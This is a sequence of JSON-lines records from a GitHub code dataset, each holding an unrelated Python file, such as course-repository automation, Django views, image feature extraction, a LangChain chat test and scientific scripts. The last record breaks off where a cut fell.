@functools.wraps(func)\n def decorator(*args: Any, **kwargs: Any) -> Any:\n try:\n return func(*args, **kwargs)\n except Exception as e:\n logger.exception(e)\n\n return decorator\n\n\n@for_all_methods(log_exception_in_loguru)\nclass Teapot:\n _canvas = None\n _gitea = None\n _git = None\n _joj = None\n _mattermost = None\n\n @property\n def canvas(self) -> Canvas:\n if not self._canvas:\n self._canvas = Canvas()\n return self._canvas\n\n @property\n def gitea(self) -> Gitea:\n if not self._gitea:\n self._gitea = Gitea()\n return self._gitea\n\n @property\n def git(self) -> Git:\n if not self._git:\n self._git = Git()\n return self._git\n\n @property\n def joj(self) -> JOJ:\n if not self._joj:\n self._joj = JOJ()\n return self._joj\n\n @property\n def mattermost(self) -> Mattermost:\n if not self._mattermost:\n self._mattermost = Mattermost()\n return self._mattermost\n\n def __init__(self) -> None:\n logger.info(\n \"Settings loaded. 
\"\n f\"Canvas Course ID: {settings.canvas_course_id}, \"\n f\"Gitea Organization name: {settings.gitea_org_name}, \"\n f\"Mattermost Team name: {settings.mattermost_team}@{settings.mattermost_domain_name}{settings.mattermost_suffix}\"\n )\n logger.debug(\"Teapot initialized.\")\n\n def add_all_canvas_students_to_teams(self, team_names: List[str]) -> None:\n return self.gitea.add_canvas_students_to_teams(self.canvas.students, team_names)\n\n def create_personal_repos_for_all_canvas_students(self, suffix: str = \"\") -> List[str]:\n return self.gitea.create_personal_repos_for_canvas_students(\n self.canvas.students,\n lambda user: default_repo_name_convertor(user) + suffix\n )\n\n def create_teams_and_repos_by_canvas_groups(\n self, group_prefix: str = \"\"\n ) -> List[str]:\n def convertor(name: str) -> Optional[str]:\n if group_prefix and not name.startswith(group_prefix):\n return None\n team_name, number_str = name.split(\" \")\n number = int(number_str)\n return f\"{team_name}-{number:02}\"\n\n return self.gitea.create_teams_and_repos_by_canvas_groups(\n self.canvas.students, self.canvas.groups, convertor, convertor\n )\n\n def get_public_key_of_all_canvas_students(self) -> Dict[str, List[str]]:\n return self.gitea.get_public_key_of_canvas_students(self.canvas.students)\n\n def clone_all_repos(self) -> None:\n for i, repo_name in enumerate(self.gitea.get_all_repo_names()):\n logger.info(f\"{i}, {self.gitea.org_name}/{repo_name} cloning...\")\n self.git.repo_clean_and_checkout(repo_name, \"master\")\n\n def create_issue_for_repos(\n self,\n repo_names: List[str],\n title: str,\n body: str,\n from_file: bool = False,\n use_regex: bool = False,\n ) -> None:\n if from_file:\n try:\n f = open(body)\n content = f.read()\n f.close()\n except FileNotFoundError:\n logger.error(f\"file {body} not found\")\n return\n except Exception as e:\n logger.exception(\"Error occurred when opening file {body}:\")\n logger.error(e)\n return\n else:\n content = body\n\n affected_repos = []\n if use_regex:\n all_repos = self.gitea.get_all_repo_names()\n for pattern in repo_names:\n affected_repos.extend([\n repo\n for repo in all_repos\n if re.search(pattern, repo) is not None\n ])\n else:\n affected_repos = repo_names\n\n for repo_name in affected_repos:\n self.gitea.create_issue(repo_name, title, content)\n\n\n def create_milestone_for_repos(\n self, repo_names: List[str], title: str, description: str, due_on: datetime\n ) -> None:\n for repo_name in repo_names:\n self.gitea.create_milestone(repo_name, title, description, due_on)\n\n def check_exist_issue_by_title(\n self, repo_names: List[str], title: str\n ) -> List[str]:\n res = []\n for repo_name in repo_names:\n if not self.gitea.check_exist_issue_by_title(repo_name, title):\n res.append(repo_name)\n return res\n\n def checkout_to_repo_by_release_name(\n self, repo_name: str, release_name: str, due: datetime = datetime(3000, 1, 1)\n ) -> bool:\n repo_releases = self.gitea.get_repo_releases(repo_name)\n release = first(repo_releases, lambda item: item.name == release_name)\n if release is None or release.created_at.replace(tzinfo=None) >= due:\n logger.warning(\n f\"{self.gitea.org_name}/{repo_name} checkout to \"\n f\"release by name {release_name} fail\"\n )\n return False\n self.git.repo_clean_and_checkout(repo_name, f\"tags/{release.tag_name}\")\n logger.info(\n f\"{self.gitea.org_name}/{repo_name} checkout to \"\n f\"tags/{release.tag_name} succeed\"\n )\n return True\n\n def get_repos_status(self, commit_lt: int, issue_lt: int) -> None:\n for 
repo_name, (\n commit_count,\n issue_count,\n ) in self.gitea.get_repos_status().items():\n if commit_count < commit_lt or issue_count < issue_lt:\n logger.info(\n f\"{self.gitea.org_name}/{repo_name} has \"\n f\"{commit_count} commit(s), {issue_count} issue(s)\"\n )\n\n\nif __name__ == \"__main__\":\n teapot = Teapot()\n","repo_name":"BoYanZh/Joint-Teapot","sub_path":"joint_teapot/teapot.py","file_name":"teapot.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"6582066155","text":"import sys\n\n# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3\ndef progress_bar(count, total, status=''):\n bar_len = 60\n filled_len = int(round(bar_len * count / float(total)))\n\n percentage_complete = round(100.0 * count / float(total), ndigits=1)\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n\n sys.stdout.write('[%s] %s%s ...%s\\r' % (bar, percentage_complete, '%', status))\n sys.stdout.flush()","repo_name":"loarie/crowdsourcing","sub_path":"util/progress_bar.py","file_name":"progress_bar.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33265642030","text":"import numpy as np\nimport cv2\nfrom skimage.feature import hog\n\n# Define a function to return HOG features and visualization\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True):\n\n # Call with two outputs if vis==True\n if vis == True:\n features, hog_image = hog(img, orientations=orient, \n pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), \n transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features, hog_image\n\n # Otherwise call with one output\n else: \n features = hog(img, orientations=orient, \n pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), \n transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features\n\n# Define a function to compute binned color features \ndef bin_spatial(img, size=(32, 32)):\n # Use cv2.resize().ravel() to create the feature vector\n return cv2.resize(img, size).ravel() \n\n# Define a function to compute color histogram features \n# NEED TO CHANGE bins_range if reading .png files with mpimg!\ndef color_hist(img, nbins=32, bins_range=(0, 256)):\n # Compute the histogram of the color channels separately\n channel1_hist = np.histogram(img[:,:,0], bins=nbins, range=bins_range)\n channel2_hist = np.histogram(img[:,:,1], bins=nbins, range=bins_range)\n channel3_hist = np.histogram(img[:,:,2], bins=nbins, range=bins_range)\n\n # Concatenate the histograms into a single feature vector\n return np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n\ndef BGR2_(img, color_space):\n color_options = {\n 'BGR': 0,\n 'RGB': cv2.COLOR_BGR2RGB,\n 'HSV': cv2.COLOR_BGR2HSV,\n 'LUV': cv2.COLOR_BGR2LUV,\n 'HLS': cv2.COLOR_BGR2HLS,\n 'YUV': cv2.COLOR_BGR2YUV,\n 'YCrCb': cv2.COLOR_BGR2YCrCb\n }\n\n conversion = color_options.get(color_space)\n if conversion == None:\n raise Exception('Did not recognize color space')\n elif conversion is 0:\n return np.copy(img) \n else:\n return cv2.cvtColor(img, conversion) \n\n# Define a function to extract features from a single image window\ndef single_img_features(feature_params, img): \n\n #1) Define an empty list to receive features\n img_features = []\n\n #2) 
Apply color conversion\n    feature_image = BGR2_(img, feature_params.color_space)\n\n    #3) Compute spatial features if flag is set\n    if feature_params.spatial_feat == True:\n        spatial_features = bin_spatial(feature_image, size=feature_params.spatial_size)\n\n        #4) Append features to list\n        img_features.append(spatial_features)\n\n    #5) Compute histogram features if flag is set\n    if feature_params.hist_feat == True:\n        hist_features = color_hist(feature_image, nbins=feature_params.hist_bins)\n\n        #6) Append features to list\n        img_features.append(hist_features)\n\n    #7) Compute HOG features if flag is set\n    if feature_params.hog_feat == True:\n        if feature_params.hog_channel == 'ALL':\n            hog_features = []\n            for channel in range(feature_image.shape[2]):\n                hog_features.extend(get_hog_features(feature_image[:,:,channel], \n                    feature_params.orient, feature_params.pix_per_cell, feature_params.cell_per_block, \n                    vis=False, feature_vec=True)) \n        else:\n            hog_features = get_hog_features(feature_image[:,:,feature_params.hog_channel], feature_params.orient, \n                feature_params.pix_per_cell, feature_params.cell_per_block, vis=False, feature_vec=True)\n\n        #8) Append features to list\n        img_features.append(hog_features)\n\n    #9) Return concatenated array of features\n    return np.concatenate(img_features)\n\n\n# Define a function to extract features from a list of images\ndef extract_features(feature_params, imgs):\n    # Create a list to append feature vectors to\n    features = []\n\n    # Iterate through the list of images\n    for file in imgs:\n        # Read in image\n        image = cv2.imread(file)\n\n        # Get features\n        features.append(single_img_features(feature_params, image))\n\n    # Return list of feature vectors\n    return features\n","repo_name":"gegkat/vehicle_detection","sub_path":"feature_utils.py","file_name":"feature_utils.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"11403901919","text":"from django.http import JsonResponse\nfrom django.views import View\n\n\n# Create your views here.\nfrom apps.client.models import ClientTest\n\n\nclass IndexView(View):\n    \"\"\"\n    The client uploads its client name and score\n    \"\"\"\n\n    def post(self, request):\n        name = request.POST.get(\"name\", \"\")\n        score = request.POST.get(\"score\", \"\")\n        if not name or not score:\n            return JsonResponse({'status': 401, 'message': 'Client name/score cannot be empty', 'data': {}})\n        client = ClientTest.objects.filter(name=name).first()\n        # Check whether the client already exists\n        if client:\n            client.score = score\n            client.save(update_fields=['score'])\n        else:\n            ClientTest.objects.create(name=name, score=score)\n        return JsonResponse({'status': 200, 'message': 'ok', 'data': {}})\n\n\nclass ChartsView(View):\n    \"\"\"\n    The client queries the leaderboard\n    \"\"\"\n\n    def get(self, request):\n        name = request.GET.get(\"name\", \"\")\n        page = request.GET.get(\"page\", \"0\")\n        page = int(page) if page.isdigit() else 1\n        client = ClientTest.objects.filter(name=name).first()\n        client_obj, result_list, data = {}, [], {}\n        if client:\n            obj_list = ClientTest.objects.order_by(\"score\")\n            rank = 0\n            for obj in obj_list:\n                rank += 1\n                obj_json = {\"rank\": rank, \"name\": obj.name, \"score\": obj.score}\n                result_list.append(obj_json)\n                if obj.name == name and obj_json:\n                    client_obj = obj_json\n            # Pagination\n            if page:\n                result_list = result_list[(page-1)*10: page*10]\n            result_list.append(client_obj)\n            data[\"result_list\"] = result_list\n        else:\n            return JsonResponse({'status': 401, 'message': 'Client does not exist', 'data': {}})\n        return JsonResponse({'status': 200, 'message': '', 'data': 
data})\n","repo_name":"ztf0413/demo","sub_path":"apps/client/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73562532072","text":"from rubatochat.core.chat import ChatOpenAIChat\nfrom langchain.callbacks.streaming_aiter import AsyncIteratorCallbackHandler\n_OPENAI_API_KEY = \"SECRET\"\n\nfrom langchain.schema import (\n AIMessage,\n HumanMessage,\n SystemMessage\n)\nfrom langchain.chat_models import ChatOpenAI\ndef test_base_chat():\n \n chat = ChatOpenAI(model_name=\"gpt-3.5-turbo\",temperature=0.3\n ,openai_api_key=_OPENAI_API_KEY)\n \n messages = [\n SystemMessage(content=\"You are an expert data scientist\"),\n HumanMessage(content=\"Write a Python script that trains a neural network on simulated data \")\n ]\n \n response=chat(messages)\n print(response.content,end='\\n')\n \n return None\n \ndef testChatOpenAIChat():\n \n callback = AsyncIteratorCallbackHandler()\n _chat = ChatOpenAIChat(\n streaming=True,\n openai_api_key=_OPENAI_API_KEY,\n verbose=True,\n callbacks=[callback]\n \n )\n print(_chat.question(\"hello, who are you?\"))\n \n return _chat\n\n#test_base_chat() \n_chat = testChatOpenAIChat()\n\n_response = _chat.question(\"who is beethoven, introduce him in 300 words\")\nprint(_response)\n\nimport pickle\n\n_serialized=pickle.dumps(_chat) \npickle.loads(_serialized)\n#print(_serialized)\n\n","repo_name":"appassionate/rubatochat","sub_path":"test/chat_test.py","file_name":"chat_test.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17069552783","text":"import argparse\n\nimport API.application\nimport API.device\nimport API.os\nimport API.resultsaver\nimport API.testrunner\n\n\ndef parse_arguments():\n '''\n Parse the given arguments.\n '''\n parser = argparse.ArgumentParser('Remote testrunner for microcontrollers')\n\n parser.add_argument('--app', choices=['iotjs', 'jerryscript'], default='iotjs',\n help='the target application (default: %(default)s)')\n\n parser.add_argument('--branch', metavar='name', default='master',\n help='an existing branch name for the app (default: %(default)s)')\n\n parser.add_argument('--buildtype', choices=['release', 'debug'], default='release',\n help='buildtype for the os and the app (default: %(default)s)')\n\n parser.add_argument('--commit', metavar='hash', default='HEAD',\n help='an existing hash within a branch (default: %(default)s)')\n\n parser.add_argument('--device', choices=['stm32f4dis', 'rpi2'], default='stm32f4dis',\n help='indicate the device for testing (default: %(default)s)')\n\n parser.add_argument('--address', metavar='address',\n help='address of the target device (ip or ip:port)')\n\n parser.add_argument('--os', choices=['nuttx', 'linux'], default='nuttx',\n help='the target oprating system (default: %(default)s)')\n\n parser.add_argument('--public', action='store_true', default=False,\n help='pusblish results to the web (default: %(default)s)')\n\n parser.add_argument('--timeout', metavar='sec', type=int, default=180,\n help='timeout for tests (default: %(default)s sec)')\n\n parser.add_argument('--username', metavar='nick', default='pi',\n help='User name to login to the board.')\n\n parser.add_argument('--remote-path', metavar='path', default='/',\n help='The root path of the remote testing on the device.')\n\n return parser.parse_args()\n\n\ndef main():\n '''\n Main function of 
the remote testrunner.\n    '''\n    arguments = parse_arguments()\n\n    device = API.device.create(arguments.device)\n    device.set_root_path(arguments.remote_path)\n    device.set_username(arguments.username)\n    device.set_address(arguments.address)\n    device.set_timeout(arguments.timeout)\n\n    app = API.application.create(arguments.app, arguments.os, device)\n    app.update_repository(arguments.branch, arguments.commit)\n\n    os = API.os.create(arguments.os, device, app)\n\n    os.prebuild()\n    app.build(arguments.buildtype)\n    os.build(arguments.buildtype, 'all')\n\n    device.flash(os)\n\n    testrunner = API.testrunner.create(os, app, device)\n    testrunner.run()\n\n    resultsaver = API.resultsaver.create(\"default\", testrunner)\n    resultsaver.save(arguments.public)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"tosyu/remote-testrunner","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"}
+{"seq_id":"16125997483","text":"import re\nfrom django.db.models import Q\nfrom public_project.models import Page\n\n\n#PublicDocs\ndef normalize_query(query_string,\n                    findterms=re.compile(r'\"([^\"]+)\"|(\\S+)').findall,\n                    normspace=re.compile(r'\\s{2,}').sub):\n    ''' Splits the query string in individual keywords, getting rid of unnecessary spaces\n        and grouping quoted words together.\n        Example:\n        \n        >>> normalize_query('  some random  words \"with   quotes  \" and   spaces')\n        ['some', 'random', 'words', 'with quotes', 'and', 'spaces']\n    \n    '''\n    return [normspace(' ', (t[0] or t[1]).strip()) for t in findterms(query_string)] \n\n\n#PublicDocs\ndef get_query(query_string, search_fields):\n    ''' Returns a query that is a combination of Q objects. That combination\n        aims to search keywords within a model by testing the given search fields.\n    \n    '''\n    query = None # Query to search for every search term \n    #terms = normalize_query(query_string)\n    for term in [query_string]: # Using complete query string instead of separated terms\n        or_query = None # Query to search for a given term in each field\n        for field_name in search_fields:\n            q = Q(**{\"%s__icontains\" % field_name: term})\n            if or_query is None:\n                or_query = q\n            else:\n                or_query = or_query | q\n        if query is None:\n            query = or_query\n        else:\n            query = query & or_query\n    return query\n\n\ndef search_for_documents(query_string):\n    entry_query = get_query(query_string, ['document__title', 'content',])\n    found_pages = Page.objects.select_related().filter(entry_query).order_by('document','number')\n    \n    document_list = []\n    for page in found_pages:\n        if page.document not in document_list:\n            page.document.search_tags = [query_string,]\n            document_list.append(page.document)\n    \n    return document_list\n    ","repo_name":"holgerd77/django-public-project","sub_path":"public_project/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"67"}
+{"seq_id":"8548630705","text":"import multiprocessing\r\nimport random\r\nimport sys\r\nimport threading\r\nimport time\r\nimport continuous_threading\r\nsys.path.append(\".\")\r\nfrom channel import Channel, nodeToChannel\r\nfrom sender import Sender, sendData\r\n\r\nif __name__ == '__main__':\r\n\r\n    #Initialize the Channel\r\n    '<--------------------------------------------------------------------------------------->'\r\n    #one common Channel\r\n    carrier = Channel()\r\n    
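# Added clarifying comment (not in the original): the single Channel instance\r\n    # above is shared by every Sender created below; each continuous thread\r\n    # receives its work as [pipe end, node(s), channel] through a multiprocessing Queue.\r\n    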
'<--------------------------------------------------------------------------------------->'\r\n #create sender nodes\r\n senders = []\r\n print(\"Enter the number of senders: \")\r\n senderNodenumber = int(input())\r\n \r\n # creating n numbers of sender nodes\r\n for i in range(senderNodenumber):\r\n senders.append(Sender(i,carrier))\r\n #node1.sendData()\r\n #carrier.nodeToChannel()\r\n\r\n '<--------------------------------------------------------------------------------------->'\r\n senderToChannel , channelToSender = multiprocessing.Pipe()\r\n #receiverToChannel , channelToreceiver = multiprocessing.Pipe()\r\n '<--------------------------------------------------------------------------------------->'\r\n cq = multiprocessing.Queue()\r\n cq.put([channelToSender,carrier,senders])\r\n c = continuous_threading.ContinuousThread(target=nodeToChannel,args={cq,})\r\n \r\n senderNodes = []\r\n q = multiprocessing.Queue()\r\n for i in range(senderNodenumber):\r\n q.put([senderToChannel,senders[i],carrier])\r\n senderNodes.append(continuous_threading.ContinuousThread(target=sendData,args={q,}))\r\n \r\n \r\n for i in range(senderNodenumber):\r\n senderNodes[i].start()\r\n\r\n #start the channel\r\n c.start()\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"SonicStrain/Computer-Networks-Lab","sub_path":"A3-CSMA/p-persistent/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73745811094","text":"from ProyectoLab.settings import MEDIA_ROOT_DOCU\nfrom ProyectoLab.settings import MEDIA_ROOT_SAVE_COSTA_RICA\nfrom docxtpl import DocxTemplate\n\n\n\n\ndef funcion_Costa_Rica(doc_name,context):\n\n base_url = MEDIA_ROOT_DOCU \n asset_url = base_url / 'Template Prestamo COSTA RICA.docx'\n tp1 = DocxTemplate(asset_url)\n tp1.render(context)\n name = \"Guia_de_Prestamo_equipo_{}.docx\".format(doc_name)\n place_to_save = MEDIA_ROOT_SAVE_COSTA_RICA /name\n tp1.save(place_to_save)\n return place_to_save\n \n\n","repo_name":"AlexisEstela-12/CISCO-ALEYA","sub_path":"Prestamos_Costa_Rica/plantilla.py","file_name":"plantilla.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23603482010","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\n\ndef bfs(weight):\n queue = deque()\n queue.append(A)\n visited = [0] * (N + 1)\n visited[A] = 1\n\n while (queue):\n V = queue.popleft()\n\n for i, w in graph[V][1:]:\n if visited[i] == 0 and w >= weight:\n visited[i] = 1\n queue.append(i)\n\n if visited[B]:\n return True\n else:\n return False\n\n\nN, M = map(int, input().split())\n\ngraph = [[0] for _ in range(N + 1)]\n# print(graph)\n\nfor i in range(M):\n a, b, c = map(int, input().split())\n graph[a].append([b, c])\n graph[b].append([a, c])\n\n# print(graph)\n\nA, B = map(int, input().split())\n\nstart = 0\nend = 1000000000\n\nwhile (start <= end):\n mid = (start + end) // 2\n\n if bfs(mid):\n result = mid\n start = mid + 1\n\n else:\n end = mid - 1\n\nprint(result)","repo_name":"sumini0516/CodingTestStudy","sub_path":"binary_search/1939.py","file_name":"1939.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30927114540","text":"from kivy.uix.screenmanager import Screen\nfrom kivy.properties import NumericProperty, ListProperty\n\n\nclass EndScreen(Screen):\n 
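# Added clarifying comment (not in the original): holds per-question\n    # correctness for the five quiz questions plus the resulting total.\n    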
questions_correct = ListProperty([False, False, False, False, False])\n total_correct = NumericProperty(0)\n\n def set_response_data(self, qs_correct: list):\n self.questions_correct = qs_correct\n\n self.total_correct = self.questions_correct.count(True)\n\n def on_pre_enter(self):\n two_d_labels = []\n # get all the boxes underneath the \"MDBoxLayout\" whose id is \"box_of_labels_box\"\n # add the labels which are children of those boxes to a list\n for box in self.ids.box_of_labels_box.children:\n two_d_labels.append(box.children)\n two_d_labels.reverse()\n\n question_num = 1\n for label_list in two_d_labels:\n for label in label_list:\n # CorrectResultLabel\n if label.text == \"Incorrect\":\n if self.questions_correct[question_num - 1]:\n label.text = \"Correct\"\n label.text_color = [0, 0.8, 0, 1]\n else:\n label.text = \"Incorrect\"\n label.text_color = [1, 0.2, 0.2, 1]\n # QuestionResultLabel\n else:\n label.text = f\"Question {question_num}: \"\n\n question_num += 1\n\n def on_enter(self, *args):\n progress_circle = self.ids.progress\n progress_circle.current_percent = self.total_correct\n\n # called when you exit the screen, rather than when you enter it\n def reset(self):\n self.questions_correct = [False, False, False, False, False]\n self.total_correct = 0\n\n self.ids.progress.current_percent = 0\n\n self.ids.correct1.text = \"Incorrect\"\n self.ids.correct2.text = \"Incorrect\"\n self.ids.correct3.text = \"Incorrect\"\n self.ids.correct4.text = \"Incorrect\"\n self.ids.correct5.text = \"Incorrect\"\n","repo_name":"ojas-sanghi/FBLA-Quiz","sub_path":"kivy_code/end.py","file_name":"end.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34000907670","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: chaomy\n# @Date: 2017-07-10 08:37:35\n# @Last Modified by: chaomy\n# @Last Modified time: 2018-07-23 15:22:50\n\nimport numpy as np\nfrom numpy import cos, sin, pi\nfrom . 
import gn_dd_data_dat as dddat\n\n\nclass gn_dd_prec(object):\n\n def __init__(self):\n self.cell = np.ndarray([3, 2])\n self.precs = None\n self.precfile = '{}.dat'.format(self.job)\n return\n\n def inplane_hcp_beta1_prec(self):\n self.ddata.precn = 30\n self.set_cell()\n self.set_prec()\n fid = self.write_precip_header()\n self.write_precip_data(fid)\n return\n\n def set_prec_strain(self):\n strain = np.zeros(6)\n return strain\n\n def set_prec_rotate(self, angle=(0., 0., 0.)):\n # check http://mathworld.wolfram.com/EulerAngles.html\n (phi, theta, psi) = angle[0], angle[1], angle[2]\n D = np.mat([[cos(phi), sin(phi), 0.],\n [-sin(phi), cos(phi), 0.],\n [0., 0., 1.]])\n C = np.mat([[1., 0., 0.],\n [0., cos(theta), sin(theta)],\n [0., -sin(theta), cos(theta)]])\n B = np.mat([[cos(psi), sin(psi), 0.],\n [-sin(psi), cos(psi), 0.],\n [0., 0., 1.]])\n A = B * C * D\n return A\n\n def set_prec_size(self): #\n lens = np.array([100, 5, 200]) * np.random.rand(3)\n size = np.array([300, 30, 800]) + lens\n return size\n\n def set_prec_coords(self):\n cell = self.ddata.cell\n pos = np.zeros(3)\n size = cell[:, 1] - cell[:, 0]\n pos = cell[:, 0] + size * np.random.rand(3)\n # along the (x, y, 0) plane\n pos[2] = 0.0\n return pos\n\n def set_prec(self):\n self.precs = []\n for i in range(self.ddata.precn):\n prec = dddat.prec()\n prec.precid = i + 1\n prec.coords = self.set_prec_coords()\n prec.dimaxi = self.set_prec_size()\n if i % 3 == 0:\n prec.rotate = self.set_prec_rotate((pi / 3., 0., 0.))\n elif i % 3 == 1:\n prec.rotate = self.set_prec_rotate((-pi / 3., 0., 0.))\n elif i % 3 == 2:\n prec.rotate = self.set_prec_rotate((0., 0., 0.))\n prec.strain = self.set_prec_strain()\n print(\"coord\", prec.coords)\n print(\"size\", prec.dimaxi)\n self.precs.append(prec)\n return\n\n def write_precip_header(self):\n fid = open(self.precfile, 'w')\n fid.write(dddat.precfile_header)\n return fid\n\n def write_precip_data(self, fid):\n # strformat = '{} ' + '{:7.6f} ' * (3 * 6) + '\\n'\n strformat = '{} ' + '{:4.3f} ' * 6\n strformat += '{:6.5f} ' * 6\n strformat += '{:2.1f} ' * 6\n strformat += '\\n'\n for prec in self.precs:\n line = strformat.format(\n prec.precid,\n prec.coords[0], prec.coords[1], prec.coords[2],\n prec.dimaxi[0], prec.dimaxi[1], prec.dimaxi[2],\n prec.rotate[0, 0], prec.rotate[0, 1],\n prec.rotate[0, 2], prec.rotate[1, 0],\n prec.rotate[1, 1], prec.rotate[1, 2],\n prec.strain[0], prec.strain[1],\n prec.strain[2], prec.strain[3],\n prec.strain[4], prec.strain[5])\n fid.write(line)\n fid.close()\n return\n","repo_name":"chaomy/Config_generate","sub_path":"gn_dd_prec_hcp.py","file_name":"gn_dd_prec_hcp.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4487067020","text":"N, T = map(int, input().split())\r\nmaxN, minN = N*2, 1\r\ncnt = 0\r\nflag = True\r\nfor _ in range(T):\r\n if flag:\r\n cnt += 1\r\n else:\r\n cnt -= 1\r\n if flag and cnt >= maxN:\r\n flag = False\r\n elif not flag and cnt <= minN:\r\n flag = True\r\nprint(cnt)","repo_name":"SSH1007/Algorithm","sub_path":"백준/Bronze/17944. 
퐁당퐁당 1/퐁당퐁당 1.py","file_name":"퐁당퐁당 1.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9640843400","text":"from itertools import product\nfrom program import Program\n\nwith open(\"data/input.txt\", 'r') as f:\n data = f.readline()\n\ndata = [int(d) for d in data.split(\",\")]\n\nprog = Program(data, 12, 2)\nprog.process()\n\nprint(\"=== PART A ===\")\nprint(prog.get_output())\n\n#===============================================================================\n\nprint(\"=== PART B ===\")\ndesired_output = 19690720\nfor noun, verb in product(range(100), range(100)):\n prog = Program(data, noun, verb)\n prog.process()\n if prog.get_output() == desired_output:\n print(\"FOUND IT!!!\")\n print(f\"Noun = {noun}\")\n print(f\"Verb = {verb}\")\n print(f\"Soln = {100*noun + verb}\")\n","repo_name":"timbook/advent-of-code-2019","sub_path":"02-day/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30428915851","text":"from __future__ import print_function\nfrom scitbx import matrix\n\n\ndef read_expt(filename):\n from dials.phil import ExperimentListConverters\n from dials.util.options import flatten_experiments\n\n converter = ExperimentListConverters(check_format=False)\n return flatten_experiments([converter.from_string(filename)])\n\n\ndef write_expt(experiments, filename):\n from dxtbx.model.experiment_list import ExperimentListDumper\n\n dump = ExperimentListDumper(experiments)\n dump.as_json(filename)\n\n\nimport sys\n\nexpts = read_expt(sys.argv[1])\nexpt = expts[0]\n\nscan = expt.scan\ngonio = expt.goniometer\n\nassert len(expt.detector) == 1\n\n# crud trying to work out correct min two theta\n\np = expt.detector[0]\n\ndims = p.get_image_size()\npixel = p.get_pixel_size()\n\nsize = tuple([_d * _p for _d, _p in zip(dims, pixel)])\nfast = matrix.col(p.get_fast_axis())\nslow = matrix.col(p.get_slow_axis())\norigin = matrix.col(p.get_origin())\n\ns0n = matrix.col(expt.beam.get_s0()).normalize()\npanel, xy = expt.detector.get_ray_intersection(s0n)\nzero = origin + xy[0] * fast + xy[1] * slow\n\nresolution = expt.detector.get_max_inscribed_resolution(expt.beam.get_s0())\nimport math\n\n# this is wrong https://github.com/dials/dials/issues/348\n# however right enough for this...\n\ntheta = math.asin(expt.beam.get_wavelength() / (2 * resolution))\nprint(\"Using two-theta: %.3f\" % (2 * theta * 180.0 / math.pi))\n\nepochs = scan.get_epochs()\nexposure_times = scan.get_exposure_times()\nimage_range = scan.get_image_range()\noscillation = scan.get_oscillation()\n\ncurrent = 1 + image_range[1] - image_range[0]\nturn = int(round(360.0 / oscillation[1]))\nextra = turn - current\n\nfor j in range(extra):\n epochs.append(0.0)\n exposure_times.append(0.0)\n\nimage_range = image_range[0], image_range[1] + extra\n\nscan.set_image_range(image_range)\nscan.set_epochs(epochs)\nscan.set_exposure_times(exposure_times)\n\nwrite_expt(expts, sys.argv[2])\n\n# now for amusement try decomposing rotation of 90 degrees about beam to\n# measure blind region - computer says no if mini kappa :(\n\ne1 = matrix.col((1, 0, 0))\ne2 = matrix.col((0.914, 0.279, -0.297))\ne3 = matrix.col((1, 0, 0))\n\nR = matrix.sqr((0, 1, 0, -1, 0, 0, 0, 0, 1))\n\nfrom dials.algorithms.refinement import rotation_decomposition\n\nsolutions = rotation_decomposition.solve_r3_rotation_for_angles_given_axes(\n R, e1, 
